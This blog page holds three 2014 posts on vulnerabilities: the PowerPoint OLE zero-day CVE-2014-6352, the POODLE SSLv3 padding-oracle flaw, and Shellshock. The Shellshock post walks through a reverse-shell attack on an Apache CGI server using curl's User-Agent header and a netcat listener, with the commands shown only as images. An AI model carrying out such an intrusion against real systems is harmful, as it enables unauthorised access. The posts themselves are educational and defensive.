(CVE-2014-6352) Zero-day vulnerability found in OLE PowerPoint

PowerPoint

Object Linking and Embedding (OLE) is nothing new and it is not even a week since the last vulnerability (CVE-2014-4114) was discovered by iSight which unveiled a Cyber Espionage Campaign attributed to the Russian hacking group labelled “Sandworm” which was successfully targeting Windows OS from Vista SP2 and up but this has not stopped the newest member of the family coming to light utilising Microsoft PowerPoint as an attack vector this time.

CVE-2014-6352 is on a phishing trip and once again in the age old “don’t click on that email you weren’t expecting” security awareness words of wisdom just don’t click on it. If you receive an email and it has a PowerPoint OR ANYTHING for the matter that you did not expect DO NOT, I REPEAT, DO NOT click on it as you may be on the fast track to infecting yourself with a nice zero-day flaw that is being actively exploited by hackers in the wild.

In a web-based attack scenario, an attacker would have to host a website that contains a specially crafted Microsoft Office file, such as a PowerPoint file, that is used in an attempt to exploit this vulnerability. In addition, compromised websites (and websites that accept or host user-provided content) could contain specially crafted content that could exploit this vulnerability. An attacker would have no method to force users to visit a malicious website. Instead, an attacker would have to persuade the targeted user to visit the website, typically by getting them to click a hyperlink that directs a web browser to the attacker-controlled website. The Microsoft Advisory states.

OLE is a tried and tested attack vector and has proven to be very successful when used in conjunction with Social Engineering technique’s, let’s face it if people keep clicking on things that they shouldn’t then this will continue into the future.

One thought I had though while writing this is that of a bad actor who has already compromised a standard user system but is having difficulty gaining administrative privileges and is already aware that the admin/s access certain documents on a server every so often, all they would have to do is modify the file and once clicked they are in and access has been granted so to speak, I know there are many other methods that would work before this but an interesting attack vector nonetheless.

 

Keep your poodle on a leash! (CVE-2014-3566)

Happy POODLE

Yet another critical vulnerability exists (CVE-2014-3566) in something we use everyday and much like the other serious vulnerabilities discovered recently this one potentially affects around 97% of the internet.

SSLv3_Pi_chart

SSL 3.0 was improved upon by SSL 2.0 by adding SHA-1 based ciphers and support for certificate authentication. This was done as serious security flaws were found in the previous version and so v3.0 was born. TLS 1.0 took over in 1999 but you should really be using at least v1.1 or v1.2 as lets face it, they were created for a reason right? Nobody creates a new version of anything for the fun of it do they, especially when it is being used by a large part of the internet.

Padding attacks are nothing new though as Serge Vaudenay a French cryptographer published back in 2002 and later in 2010 successful attacks were applied to several web application frameworks (WAFS).

What is an Oracle Attack though? Well  “an oracle attack is an attack that exploits the availability of a weakness in the system which can be used as an “oracle” which can give a simple go/no go indication to show whether the attacker has reached, or is nearing, their goal. The attacker can then combine the oracle with systematic search of the problem space to complete their attack.”

Ok but what is an oracle? Well “an oracle is a mechanism used by software testers and software engineers for determining whether a test has passed or failed. It is used by comparing the output(s) of the system under test, for a given test case input, to the outputs that the oracle determines that product should have. The term was first used and defined in William Howden’s Introduction to the Theory of Testing.”

Now that we have discovered what a Padding oracle attack is we have pieced together some of the POODLE acronym, it actually stands for “Padding Oracle On Downgraded Legacy Encryption”and it was discovered by Google.

Ok, how does this look in a diagram? Glad you asked as I put together a little flowchart below which you may find interesting as this is a protocol flaw and not an implementation issue.

CBC-Cipher-Block-Chaining-breakdown-1

What you are looking at in the above flowchart is a lot simpler than it looks, it is a Cipher Block Chain (CBC). “In cryptography a mode of operation is an algorithm that uses a block cipher to provide an information service such as confidentiality or authenticity.”

Cipher_closeup

Pretty much your plaintext goes in, it then has an initialization vector (iv) added to it, think of this as a starting variable (sv) which is used to randomise the encryption process, each block of plaintext is encrypted using a key that is derived from the previous block of ciphertext that is scrambled using a process called exclusive-OR (Xor) and padded where necessary to make blocks of the required size.

CBC is still widely used today as you have now discovered with the discovery of POODLE which is sure to have some tools released in the coming days much like the BEAST (Browser Exploit Against SSL/TLS) or CRIME attacks, BEAST like this vulnerability was also discovered by Thai Duong along with Juliano Rizzo and discovered on September 23, 2011.

How do I protect myself from a POODLE attack?

Don’t connect to a Wi-Fi hotspot that you are not in control of as this is where the most probable attack will most likely occur at the time of writing this article. It is possible to be downgraded to SSL 3.0 if using another protocol so even if you are using something else this could be your fall back!

How can I detect it?

Use an Intrusion Detection System (IDS) as signatures already exist to detect such a threat that may be happening on your network.

References:

“Padding oracle attack – Wikipedia, the free encyclopedia.” 2010. 16 Oct. 2014 <http://en.wikipedia.org/wiki/Padding_oracle_attack>

“Oracle (software testing) – Wikipedia, the free encyclopedia.” 2009. 16 Oct. 2014 <http://en.wikipedia.org/wiki/Oracle_(software_testing)>

“Block cipher mode of operation – Wikipedia, the free …” 2004. 16 Oct. 2014 <http://en.wikipedia.org/wiki/Block_cipher_mode_of_operation>

 

 

Bash vulnerability (CVE-2014-6271) “Shellshock” Analysis with Wireshark

ShellShock

 

What is with all these new fun and exciting vulnerabilities we have encountered recently like Heartbleed and ShellShock?

Both of these are a very big deal for anyone in IT whether you are in a general admin role or an IT Security position. In most cases, it will be up to system administrators and software companies to issue patches.

Both have existed for years and remained unnoticed or have they? Someone else has surely noticed these before they had been made public and abused them to gain access to systems and this does not just include Government Actors who are known to hoard all of the vulnerabilities they find but Threat Actors too just out to infiltrate as much as they possibly can and cast the widest net they can and ultimately becoming an Advanced Persistent Threat (APT).

Regarding the name ShellShock it seems to have originated from this twitter page by Andreas Lindh and Robert Graham the image above is also Andreas creation and is quite a cool image at that which grabs your attention. The researcher who discovered it however was Stephan Chazelas.

In my short video which you can see below, I show you how easy it actually is to exploit this vulnerability of which has many different attack vectors which include Linux OS, Apple OS, DHCP, SSH, OpenSSH, OpenVPN, Apache, Embedded devices, rooted phones, SCADA systems powering our infrastructure, the list goes on and if you are using Windows and have CygWin installed you may also be vulnerable to the recent vulnerability.

Looking at one of these different vectors and breaking down this vulnerability in an Apache environment which requires mod_cgi to be enabled is quite simple for the Threat Actor who has found this vulnerability on your server possibly by using curl to see what headers are available to them.

im1

Now if we look at the file output in the cgi file we just created you will see a similar output:

im2

Next the attacker tries to connect to your Apache server using curl and the handy User­Agent flag in curl with netcat listening on the attacking machine:

Netcat listening on port 4444:

im3

Curl using the User­Agent flag creating a reverse tcp shell on the target machine with the bash vulnerability:

im4

Success looks like the following:

im5

Looking at the initial curl command a bit closer we can see that the host has accepted our connection attempt and the User­Agent flag contains the reverse shell back to the attacking machine:

im6

As of the 7th of October Malware Must Die posted on their blog the threat known as “Mayhem” in which the white­hat security research workgroup performs a detailed analysis of the infection and warns that we have not seen the final wave of this bash vulnerability yet.

What have we learned from this vulnerability? Maybe that we should not always take for granted that we are secure and that the best form of defense is a layered approach which incorporates network forensics in which you can look back in time and see what happened in the event of a breach.

I know for a fact that some people out there would not have known their systems had been hit had they not been able to go back a few days or months simply and quickly to check with a nice report and pass it on to their security team to investigate with all the detail required to pass on to the authorities if needed.

Sniff your traffic, understand the packets.